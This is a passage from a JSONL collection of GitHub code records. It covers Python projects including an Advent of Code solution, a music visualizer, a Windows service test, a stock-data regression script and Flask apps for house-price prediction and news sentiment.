Counter()\n for row in layer:\n c.update(row)\n if best is None:\n best = c\n elif c[0] < best[0]:\n best = c\n return best[1] * best[2]\n\n\ndef value(layers, x, y):\n layer = 0\n while layers[layer][y][x] == TRANSP:\n layer += 1\n return layers[layer][y][x]\n\n\ndef decode(layers, xmax, ymax):\n image = [[0] * xmax for _ in range(ymax)]\n for y in range(ymax):\n for x in range(xmax):\n image[y][x] = value(layers, x, y)\n\n return image\n\n\ndef show(img):\n for row in img:\n s = \"\".join(list(map(str, row)))\n print(s.replace(\"0\", \" \").replace(\"1\", \"*\"))\n\n\nif __name__ == \"__main__\":\n data = read_data()\n layers = make_image(25, 6, data)\n\n print(f\"Part1: {checksum(layers)}\")\n show(decode(layers, 25, 6))\n","repo_name":"xpqz/aoc-19","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11395546775","text":"from array import array\nfrom pathlib import Path\n\nimport numpy as np\nfrom MMV.Sombrero.SombreroShader import *\n\n\nclass FullScreenConstructor:\n def __init__(self, SombreroMain):\n self.SombreroMain = SombreroMain\n self.SombreroContext = self.SombreroMain.SombreroContext\n self.VertexShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"RectanglesVertex.glsl\").read_text()\n self.GeometryShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"RectanglesGeometry.glsl\").read_text()\n self.num_vertices = 4\n self.buffer = self.SombreroContext.OpenGL_Context.buffer(reserve=16)\n self.buffer.write(array(\"f\", [0, 0, 2, 2]))\n self.once_returned_vao = False\n \n def TreatFragmentShader(self, SombreroShader):\n io_placeholder = SombreroShader.IOPlaceHolder\n IO(\"vec2\", \"OpenGLUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec2\", \"ShaderToyUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec4\", \"fragColor\", prefix = False, mode = \"o\")(io_placeholder)\n\n def vao(self):\n if self.once_returned_vao: return\n self.once_returned_vao = True\n return [(self.buffer, \"2f 2f\", \"InPos\", \"InSize\"),]\n\n def next(self):\n pass\n\n\n\nclass PianoRollConstructor:\n def __init__(self, SombreroMain, piano_roll, expect, maxkeys = 500):\n self.SombreroMain = SombreroMain\n self.SombreroContext = self.SombreroMain.SombreroContext\n self.piano_roll = piano_roll\n self.expect = expect\n self.VertexShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"PianoVertex.glsl\").read_text()\n self.GeometryShader = Path(self.SombreroMain.SombreroDir/\"Constructors\"/\"PianoGeometry.glsl\").read_text()\n self.buffer = self.SombreroContext.OpenGL_Context.buffer(reserve = 9 * 4 * maxkeys)\n \n def TreatFragmentShader(self, SombreroShader):\n io_placeholder = SombreroShader.IOPlaceHolder\n IO(\"vec2\", \"OpenGLUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec2\", \"ShaderToyUV\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"note\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"velocity\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"channel\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"IsPlaying\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"float\", \"IsWhite\", prefix = False, mode = \"i\")(io_placeholder)\n IO(\"vec4\", \"fragColor\", prefix = False, mode = \"o\")(io_placeholder)\n\n def vao(self):\n self.buffer.clear()\n\n instructions = self.piano_roll.generate_note_coordinates()\n\n draw = [attr for note in instructions[self.expect] for attr in note]\n self.buffer.write(array(\"f\", draw))\n self.num_vertices = 4 * len(instructions[self.expect])\n\n return (self.buffer,\n \"2f 2f 1f 1f 1f 1f 1f\",\n \"InPos\", \"InSize\", \"InNote\", \"InVelocity\", \"InChannel\", \"InIsPlaying\", \"InIsWhite\"\n ),\n\n def next(self):\n pass","repo_name":"Tremeschin/ModularMusicVisualizer","sub_path":"App/MMV/Sombrero/SombreroConstructor.py","file_name":"SombreroConstructor.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"} +{"seq_id":"32848431190","text":"cores = {\n 'limpar': '\\033[m',\n 'vermelho': '\\033[0;31m',\n 'verde': '\\033[0;32m',\n 'amarelo': '\\033[0;33m',\n 'azul': '\\033[0;34m',\n 'roxo': '\\033[0;35'\n}\nli = cores['limpar']\nvm = cores['vermelho']\nvd = cores['verde']\nam = cores['amarelo']\naz = cores['azul']\nrx = cores['roxo']\n\n# Minha solução\n'''\nprint('Gerador de PA')\nprint('-=' * 12)\npri = int(input('Primeiro termo: '))\nraz = int(input('Razão da PA: '))\ncont = 1\ntottermo = 0\nwhile cont != 0:\n print(f'{am}{pri}{li}', end=' → ')\n pri += raz\n cont += 1\n tottermo += 1\n if cont > 10:\n print(f'{az}PAUSA{li}')\n mais = int(input(f'Quantos termos você quer mostrar a mais? '))\n if mais == 0:\n cont = 0\n else:\n print(f'{am}{pri}{li}', end=' → ')\n cont -= mais - 1\n pri += raz\n tottermo += 1\nprint(f'Progressão finalizada com {vd}{tottermo}{li} termos mostrados.')\n'''\n\n# Minha solução feito através da correção do ex061\nprint(f'{az}Gerador de PA')\nprint(f'{am}-={li}' * 12)\npri = int(input('Primeiro termo: '))\nraz = int(input('Razão da PA: '))\ntermo = pri\ncont = 1\nmais = 1\ntottermos = 0\nwhile cont <= 10 and mais != 0:\n print(f'{az}{termo}{li} → ', end='')\n termo += raz\n cont += 1\n tottermos += 1\n if cont > 10:\n print(f'{am}PAUSA{li}')\n mais = int(input('Quantos termos você quer mostrar a mais? '))\n if mais != 0:\n cont -= mais\nprint(f'Progressão finalizada com {vd}{tottermos}{li} termos mostrados.')\n\n# Solução Gustavo Guanabara\n'''\nprimeiro = int(input('Primeiro Termo: '))\nrazão = int(input('Razão da PA: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\nwhile mais != 0:\n total += mais\n while cont <= total:\n print('{} → '.format(termo), end='')\n termo += razão\n cont += 1\n print('PAUSA')\n mais = int(input('Quantos termos você quer mostrar a mais? '))\nprint('Progresso finalizada com {} termos mostrados.'.format(total))\n'''\n","repo_name":"opedrovs/python","sub_path":"exercicios/ex062.py","file_name":"ex062.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29360846092","text":"import win32serviceutil\nimport win32service\nimport win32event\nimport servicemanager\nimport asyncio\nimport functools\nimport threading\n\n\nclass AppServerSvc (win32serviceutil.ServiceFramework):\n _svc_name_ = \"TestServiceAsync\"\n _svc_display_name_ = \"Test Service with Asyncio\"\n\n def __init__(self,args):\n win32serviceutil.ServiceFramework.__init__(self,args)\n #self.hWaitStop = win32event.CreateEvent(None,0,0,None)\n self.event_loop = asyncio.get_event_loop()\n self.wait_event = asyncio.Event(loop=self.event_loop)\n #socket.setdefaulttimeout(60)\n\n @staticmethod\n def set_stop_event(event):\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"setting event {0}\\n\".format(threading.current_thread().name))\n event.set()\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n #win32event.SetEvent(self.hWaitStop)\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"stopping {0}\\n\".format(threading.current_thread().name))\n\n self.event_loop.call_soon_threadsafe(functools.partial(AppServerSvc.set_stop_event, self.wait_event))\n\n def SvcDoRun(self):\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_,''))\n self.main()\n\n async def long_waited_job(self):\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"Doing job and waiting {0}\\n\".format(threading.current_thread().name))\n await self.wait_event.wait()\n\n def main(self):\n\n with open(r\"c:\\test.txt\",\"w\") as f:\n f.write(\"started {0}\\n\".format(threading.current_thread().name))\n #win32event.WaitForSingleObject(self.hWaitStop,win32event.INFINITE)\n self.event_loop.run_until_complete(self.long_waited_job())\n self.event_loop.close()\n\n\n with open(r\"c:\\test.txt\",\"a\") as f:\n f.write(\"stopped {0}\\n\".format(threading.current_thread().name))\n \n pass\n\nif __name__ == '__main__':\n win32serviceutil.HandleCommandLine(AppServerSvc)\n","repo_name":"beeven/gbase-service","sub_path":"testservice_async.py","file_name":"testservice_async.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70101286954","text":"class Solution:\n \"\"\"\n @param: nums: An integer\n @return:\n \"\"\"\n\n def recoverRotatedSortedArray(self, nums):\n length = len(nums)\n i = 0\n for i in range(1, length):\n if nums[i] < nums[i - 1]:\n break\n else:\n return\n self.__reverse(nums, 0, i)\n self.__reverse(nums, i, length)\n self.__reverse(nums, 0, length)\n\n def __reverse(self, nums, left, right):\n l, r = left, right - 1\n while l < r:\n tempVal = nums[l]\n nums[l] = nums[r]\n nums[r] = tempVal\n l, r = l + 1, r - 1\n","repo_name":"craig04/lintCode_Python","sub_path":"lintCode/lt_039_recover_rotated_sorted_array.py","file_name":"lt_039_recover_rotated_sorted_array.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5636232475","text":"#!/usr/bin/env python\r\n##\r\nfrom stockObject import stockObject\r\nfrom financialObject import financialObject\r\nfrom core import dbConnection\r\nimport plotly.plotly as py\r\nimport plotly\r\nimport plotly.graph_objs as go\r\nfrom datetime import datetime, timedelta\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport scipy\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\n#input stock_f, array of financial info to be analyzed (revenue,profit,cash,equity,eps, or debt) and pricevstime\r\n#output array of analyzed financial info\r\ndef financialChangevsTime(stock_f,financialInfo,pricevsTime):\r\n counter =0\r\n for i in financialInfo:\r\n stock_f.getFinancials(i)\r\n if i == 'Revenue':\r\n data = np.zeros(len(stock_f.revenue))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.revenue[x+1]/stock_f.revenue[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.revenue).index.values, columns = ['revenue_change'])\r\n data['revenue'] = stock_f.revenue\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Profit':\r\n data = np.zeros(len(stock_f.profit))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.profit[x+1]/stock_f.profit[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.profit).index.values, columns = [\"profit_change\"])\r\n data['profit'] = stock_f.profit\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Cash':\r\n data = np.zeros(len(stock_f.cash))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.cash[x+1]/stock_f.cash[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.cash).index.values, columns = ['cash_change'])\r\n data['cash'] = stock_f.cash\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Equity':\r\n data = np.zeros(len(stock_f.equity))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.equity[x+1]/stock_f.equity[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.equity).index.values, columns = ['equity_change'])\r\n data['equity'] = stock_f.equity\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Eps':\r\n data = np.zeros(len(stock_f.eps))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.eps[x+1]/stock_f.eps[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.eps).index.values, columns = ['eps_change'])\r\n data['eps'] = stock_f.eps\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Debt':\r\n data = np.zeros(len(stock_f.debt))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.debt[x+1]/stock_f.debt[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.debt).index.values, columns = [\"debt_change\"])\r\n data['debt'] = stock_f.debt\r\n financialInfo[counter] = data[1:]\r\n counter+=1 \r\n financialsArray = addCorrespondingPrice(financialInfo,pricevsTime)\r\n return financialsArray\r\n\r\n#inputs stockObject\r\n#outputs price Change vs time and price vs time of desired stock\r\ndef priceChangevsTime(stock):\r\n price = stock.requested_data['closing_price']\r\n dates = stock.requested_data.index.values\r\n priceChange = []\r\n for x in range(len(price)-1):\r\n change = float(price[x+1]/price[x])\r\n priceChange.extend([change]) \r\n data = pd.Series(priceChange,dates[1:], name = 'closing_price')\r\n \r\n\r\n return data,price\r\n## Input an array with dataframes of financial info, and a dataframe with price vs time info\r\n## output : attaches corresponding price vs time to financial info and returns an array\r\n## containing all Dataframes\r\ndef addCorrespondingPrice(financialsArray,pricevsTime):\r\n for i in financialsArray:\r\n i['closing_price']=float(0)\r\n counter = 0\r\n for x in range(len(i)):\r\n temp_date = i.index.values[counter]\r\n ## checking if date exists\r\n result = False\r\n while result is False:\r\n try:\r\n realDate = pricevsTime.index.get_loc(temp_date)\r\n result = True\r\n except KeyError:\r\n temp_date = temp_date -timedelta(days=1)\r\n else:\r\n temp_price = float(pricevsTime[realDate])\r\n i['closing_price'][counter] = temp_price\r\n counter+=1\r\n return financialsArray\r\n\r\n#input: array of financial arrays (must contain 6 dataframes) to plot and i. i: 0= plot change , i: 1= plot numbers\r\ndef plotFinancial(financialInfoArray,i): \r\n \r\n fig = plotly.tools.make_subplots(rows=3, cols=2)\r\n \r\n #data\r\n trace0 = financialInfoArray[0].columns[i]\r\n trace1 = financialInfoArray[1].columns[i]\r\n trace2 = financialInfoArray[2].columns[i]\r\n trace3 = financialInfoArray[3].columns[i]\r\n trace4 = financialInfoArray[4].columns[i]\r\n trace5 = financialInfoArray[5].columns[i]\r\n \r\n trace0 = go.Scatter(x = financialInfoArray[0][trace0] , y = financialInfoArray[0]['closing_price'],\r\n mode = 'markers', name = '%s' %trace0)\r\n trace1 = go.Scatter(x = financialInfoArray[1][trace1] , y = financialInfoArray[1]['closing_price'],\r\n mode = 'markers',name = '%s' %trace1)\r\n trace2 = go.Scatter(x = financialInfoArray[2][trace2] , y = financialInfoArray[2]['closing_price'],\r\n mode = 'markers',name = '%s' %trace2)\r\n trace3 = go.Scatter(x = financialInfoArray[3][trace3] , y = financialInfoArray[3]['closing_price'],\r\n mode = 'markers',name = '%s' %trace3)\r\n trace4 = go.Scatter(x = financialInfoArray[4][trace4] , y = financialInfoArray[4]['closing_price'],\r\n mode = 'markers',name = '%s' %trace4)\r\n trace5 = go.Scatter(x = financialInfoArray[5][trace5] , y = financialInfoArray[5]['closing_price'],\r\n mode = 'markers',name = '%s' %trace5)\r\n\r\n \r\n data = [trace0,trace1,trace2,trace3,trace4,trace5]\r\n \r\n fig.append_trace(data[0], 1, 1)\r\n fig.append_trace(data[1], 1, 2)\r\n fig.append_trace(data[2], 2, 1)\r\n fig.append_trace(data[3], 2, 2)\r\n fig.append_trace(data[4], 3, 1)\r\n fig.append_trace(data[5], 3, 2)\r\n\r\n fig['layout']['title'] = 'Financials vs Price'\r\n fig['layout']['showlegend'] = True\r\n fig['layout'].update(height=1000, width=1000)\r\n \r\n plotly.offline.plot(fig, filename='plot.html')\r\n\r\ndef machineLearningAlgorithm(input_X,input_Y):\r\n # training Data\r\n train_X = np.asarray(input_X['revenue'])\r\n train_Y = np.asarray(input_Y)\r\n print(train_X)\r\n print(train_Y)\r\n print(train_X.shape)\r\n #algorithm parameters\r\n learning_rate = 0.1\r\n training_epochs = 1000\r\n display_step = 200\r\n # Data Set Paramaters\r\n n_features = 1\r\n numLabels = 20\r\n \r\n # Output layer\r\n X = tf.placeholder(tf.float32) ## input\r\n Y = tf.placeholder(tf.float32) ## output\r\n\r\n # Output layer\r\n W = tf.Variable(tf.random_normal([numLabels, n_features]), name=\"weights\")\r\n b = tf.Variable(tf.random_normal([n_features]), name=\"biases\")\r\n\r\n \r\n # Construct a linear model\r\n pred = tf.add(tf.multiply(X, W), b)\r\n \r\n # Mean squared error\r\n cost = tf.reduce_sum(tf.pow(pred-Y, 2))/(2*n_features)\r\n \r\n # Gradient descent\r\n # Note, minimize() knows to modify W and b because Variable objects are trainable=True by default\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\r\n \r\n # Initialize the variables\r\n init = tf.global_variables_initializer()\r\n \r\n # Start training\r\n with tf.Session() as sess:\r\n # Run the initializer\r\n sess.run(init)\r\n \r\n # Fit all training data\r\n for epoch in range(training_epochs):\r\n for (x, y) in zip(train_X, train_Y):\r\n sess.run(optimizer, feed_dict={X: x, Y: y})\r\n\r\n # Display logs per epoch step\r\n if (epoch+1) % display_step == 0:\r\n c = sess.run(cost, feed_dict={X: train_X, Y:train_Y})\r\n print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(c), \\\r\n \"W=\", sess.run(W), \"b=\", sess.run(b))\r\n \r\n # Graphic display\r\n fig = plt.figure()\r\n plt.plot(train_X, train_Y, 'ro', label='Original data')\r\n plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\r\n plt.legend()\r\n fig.savefig('optimization.png')\r\n \r\ndef main():\r\n stock = stockObject()\r\n name = sys.argv[1]\r\n stock.init_date = sys.argv[2]\r\n stock.final_date = sys.argv[3]\r\n stock.stock_name = name+'_1d'\r\n \r\n # getting stock price info\r\n stock.getData_df()\r\n (priceChange_vsTime,pricevsTime) = priceChangevsTime(stock)\r\n dates = pricevsTime.index.values\r\n \r\n #getting financial info\r\n stock_f = financialObject()\r\n stock_f.name = name+'_f'\r\n financialArray = financialChangevsTime(stock_f,['Revenue','Profit','Cash','Equity','Eps','Debt'],pricevsTime)\r\n # creating financial arrays with all info needed \r\n revvsTime = financialArray[0]\r\n profvsTime = financialArray[1]\r\n cashvsTime = financialArray[2]\r\n equivsTime = financialArray[3]\r\n epsvsTime = financialArray[4]\r\n debtvsTime = financialArray[5]\r\n #plotting data\r\n #plotdata = [revvsTime,profvsTime,cashvsTime,equivsTime,epsvsTime,debtvsTime]\r\n #plotFinancial(plotdata,1)\r\n \r\n #rearranging data for model .Using last 5 years\r\n years = 5*4\r\n datax = pd.DataFrame()\r\n datax['eps']=epsvsTime['eps'][:years]\r\n datax['revenue']=revvsTime['revenue'][:years]\r\n datax['profit']=profvsTime['profit'][:years]\r\n datax['cash']=cashvsTime['cash'][:years]\r\n datax['equity']=equivsTime['equity'][:years]\r\n datax['debt']=debtvsTime['debt'][:years]\r\n\r\n datay = pd.DataFrame()\r\n datay['eps']=epsvsTime['closing_price'][:years]\r\n datay['revenue']=revvsTime['closing_price'][:years]\r\n datay['profit']=profvsTime['closing_price'][:years]\r\n datay['cash']=cashvsTime['closing_price'][:years]\r\n datay['equity']=equivsTime['closing_price'][:years]\r\n datay['debt']=debtvsTime['closing_price'][:years]\r\n \r\n #rearranging data for model\r\n train_X = datax\r\n train_Y = datay['eps']/datay['eps'].max()\r\n# input --> weights --> hidden l1 (func)--> weights --> hidden l2 (func)--> etc..\r\n# compare output and intended output (cost)\r\n# optimize cost --> optimizer\r\n#back propagation \r\n##--> feed forward + backprop = epoch\r\n\r\n \r\n #Dividing everything over max value\r\n train_X['eps'] = train_X['eps']/train_X['eps'].max()\r\n train_X['revenue'] = train_X['revenue']/train_X['revenue'].max()\r\n train_X['profit'] = train_X['profit']/train_X['profit'].max()\r\n train_X['cash'] = train_X['cash']/train_X['cash'].max()\r\n train_X['equity'] = train_X['equity']/train_X['equity'].max()\r\n train_X['debt'] = train_X['debt']/train_X['debt'].max()\r\n\r\n \r\n machineLearningAlgorithm(train_X,train_Y)\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"jonathanb150/ljb","sub_path":"html/algorithms/newAlgo.py","file_name":"newAlgo.py","file_ext":"py","file_size_in_byte":11246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9357772249","text":"import pandas as pd\nimport numpy as np\nfrom flask import Flask, request, render_template\nimport xgboost\nimport pickle\nimport os\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nfrom selenium import webdriver\n\n\n# Create Flask App\napp = Flask(__name__)\n\n# Load the scalar and regression model pickle files\nscalar_pk = pickle.load(open(\"hp_scalar.pkl\",\"rb\"))\nxgbmodel_pk = pickle.load(open(\"hp_xgbmodel.pkl\",\"rb\"))\n\n# Loading housedata and average price data\ndf_housedata = pd.read_csv(\"formatted_housedata.csv\")\naverage_price_df = pd.read_csv(\"average_price_df.csv\")\n\n# Create city list for dropdown\ncity_list = average_price_df[\"primary_city\"].tolist()\n\n# Homepage app route\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\",city_list=city_list)\n\n# Predict app route\n@app.route(\"/predict\", methods=['GET',\"POST\"])\ndef predict_api():\n # Get input from form\n sqft_living = request.form.get(\"sqft_living\")\n grade = request.form.get(\"grade\")\n sqft_above = request.form.get(\"sqft_above\")\n bathrooms = request.form.get(\"bathrooms\")\n city = request.form.get(\"city\")\n view = request.form.get(\"view\")\n sqft_basement = request.form.get(\"sqft_basement\")\n bedrooms = request.form.get(\"bedrooms\")\n\n # Get city rank\n city_rank = average_price_df.loc[average_price_df.primary_city == city, \"city_rank\"].values[0]\n\n # Filter data for current city\n predict_filter_df = df_housedata[df_housedata[\"city_rank\"] == city_rank]\n\n # Create input dataframe for prediction\n pred_df = pd.DataFrame(columns=[\"sqft_living\",\"grade\",\"sqft_above\",\"bathrooms\",\"city_rank\",\"view\",\"sqft_basement\",\"bedrooms\"])\n pred_df[\"sqft_living\"] = [sqft_living]\n pred_df[\"grade\"] = grade\n pred_df[\"sqft_above\"] = sqft_above\n pred_df[\"bathrooms\"] = bathrooms\n pred_df[\"city_rank\"] = city_rank\n pred_df[\"view\"] = view\n pred_df[\"sqft_basement\"] = sqft_basement\n pred_df[\"bedrooms\"] = bedrooms\n\n # Fill in mean value for columns that have no data\n for column in pred_df:\n if pred_df.loc[0,column] == \"\":\n pred_df.loc[0,column] = predict_filter_df.groupby(\"city_rank\")[column].mean().round(0).values[0]\n\n # Scale the prediction input dataset \n pred_scaled = scalar_pk.transform(pred_df)\n \n # Predict house price using xgboost model\n prediction = xgbmodel_pk.predict(pred_scaled)\n prediction = np.exp(prediction)\n\n # Rename columns for display in HTML\n pred_details = pred_df.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\" })\n pred_details[\"City\"] = city\n pred_details = pred_details[[\"City\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n\n # Get Maximum Price Row and format for html display \n max_details = predict_filter_df[predict_filter_df.price == predict_filter_df.price.max()]\n max_details['price'] = max_details['price'].astype('int64') \n max_details = max_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n max_details[\"City\"] = city\n max_details[\"Price\"] = max_details[\"Price\"].map(\"${:,.0f}\".format)\n max_details = max_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #max_details = max_details.transpose()\n\n # Get Maximum Price Row and format for html display \n min_details = predict_filter_df[predict_filter_df.price == predict_filter_df.price.min()]\n min_details['price'] = min_details['price'].astype('int64') \n min_details = min_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n min_details[\"City\"] = city\n min_details[\"Price\"] = min_details[\"Price\"].map(\"${:,.0f}\".format)\n min_details = min_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #min_details = min_details.transpose()\n \n # Get Maximum Price Row and format for html display \n predict_filter_df[\"Median_Price\"] = predict_filter_df.price.median()\n predict_filter_df[\"Diff_From_Median\"] = predict_filter_df['price'] - predict_filter_df[\"Median_Price\"]\n predict_filter_df[\"Diff_From_Median\"] = predict_filter_df[\"Diff_From_Median\"].abs()\n median_details = predict_filter_df[predict_filter_df.Diff_From_Median == predict_filter_df.Diff_From_Median.min()]\n median_details['price'] = median_details['price'].astype('int64') \n median_details = median_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n median_details[\"City\"] = city\n median_details[\"Price\"] = median_details[\"Price\"].map(\"${:,.0f}\".format)\n median_details = median_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #median_details = median_details.transpose() \n\n # Create html table for diaplay\n pred_table = pred_details.to_html(classes='data', header=True, index=False, justify=\"left\")\n max_table = max_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n min_table = min_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n median_table = median_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n\n return render_template(\"predict.html\", prediction=prediction[0],city_list=city_list,tables=[pred_table],\n maxtable=[max_table],mintable=[min_table],mediantable=[median_table])\n\n# Scrape app route\n@app.route(\"/Scrape\", methods=['GET',\"POST\"])\ndef scrape_api():\n\n def county_news(browser):\n # Visit the mars nasa news site\n url = 'https://patch.com/washington/seattle'\n browser.visit(url)\n \n # Optional delay for loading the page\n browser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n # Parse the HTML\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n try:\n slide_elem = news_soup.select_one('article')\n\n # Use the parent element to find the first `a` tag and save it as `news_title`\n news_title = slide_elem.find(\"h2\", class_=\"styles_Card__Title__vp17Z styles_Card__Title--Is-Serif__2ClLt\").get_text()\n news_wrapper = slide_elem.find(\"p\", class_=\"styles_Card__Description__3tUgd\").get_text()\n news_link_rel = slide_elem.find(\"a\", class_=\"styles_Card__Thumbnail__1-_Rw\").get(\"href\")\n news_link = f'https://patch.com{news_link_rel}'\n news_pic = slide_elem.find(\"img\", class_=\"styles_Card__ThumbnailImage__2aX1C is-lazy-loaded\").get(\"src\")\n\n except AttributeError:\n return None, None\n \n return news_title,news_wrapper,news_link,news_pic\n\n chrome_options = webdriver.ChromeOptions()\n chrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n driver = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=chrome_options)\n\n # Initiate headless driver for deployment\n browser = Browser(\"chrome\", executable_path=\"chromedriver\", headless=True)\n news_title, news_wrapper,news_link,news_pic = county_news(browser)\n # scrape_date = scraping.scrape_all()\n # map_pic = scrape_date[\"featured_image\"]\n # news_title = scrape_date[\"news_title\"]\n # news_wrapper = scrape_date[\"news_wrapper\"]\n # news_link = scrape_date[\"news_link\"]\n # news_pic = scrape_date[\"news_pic\"]\n return render_template(\"scrape.html\",news_title=news_title,news_wrapper=news_wrapper,news_link=news_link,news_pic=news_pic)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ssathyanath/House_Price_Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14510050210","text":"import json\nfrom flask import Flask, jsonify\nimport requests\nfrom textblob import TextBlob\nfrom flask_cors import CORS\nimport configparser\n\napp = Flask(__name__)\nCORS(app)\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nAPI_KEY = config.get('API_KEYS', 'api_key') # Replace with your News API key\n\n@app.route('/news')\ndef get_news():\n # Make a request to the News API\n url = f'https://newsapi.org/v2/top-headlines?country=us&apiKey={API_KEY}'\n response = requests.get(url)\n\n if response.status_code == 200:\n news_data = response.json()\n categorized_news = categorize_news(news_data)\n return json.dumps(categorized_news) # Serialize the data as JSON\n else:\n return jsonify({'error': 'Failed to fetch news data'})\n\ndef categorize_news(news_data):\n categorized_news = {\n 'happy': 0,\n 'sad': 0,\n 'angry': 0,\n 'optimistic': 0,\n 'pessimistic': 0\n }\n\n # Extract articles from the news data\n articles = news_data.get('articles', [])\n\n for article in articles:\n title = article.get('title', '')\n description = article.get('description', '')\n content = f'{title}. {description}'\n\n # Perform sentiment analysis using TextBlob\n blob = TextBlob(content)\n sentiment = blob.sentiment.polarity\n\n # Categorize article based on sentiment\n if sentiment > 0.2:\n categorized_news['happy'] += 1\n 